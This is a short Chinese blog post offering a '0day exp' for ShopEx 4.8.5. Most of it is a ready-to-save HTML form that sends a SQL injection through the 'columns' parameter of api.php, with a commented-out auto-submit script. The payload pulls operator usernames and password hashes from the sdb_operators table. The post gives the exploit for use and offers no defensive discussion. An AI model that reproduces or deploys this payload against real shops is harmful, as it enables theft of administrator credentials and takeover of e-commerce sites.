shopex 4.8.5 api.php注入漏洞0day exp

    Save as html

    <form method='post' action='http://www.hacker-noelle.com/api.php?act=search_dly_type&api_version=1.0'>
    <input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br />
    <input type='submit' value='submit' /><br />
    </form>
    <script>
    //document.forms[0].submit()
    </script>
    本博客所有文章如无特别注明均为原创。
    复制或转载请以超链接形式注明转自n0elle's Blog,原文地址《shopex 4.8.5 api.php注入漏洞0day exp
    标签:
    喜欢 | 0
    分享:

还没有人抢沙发呢~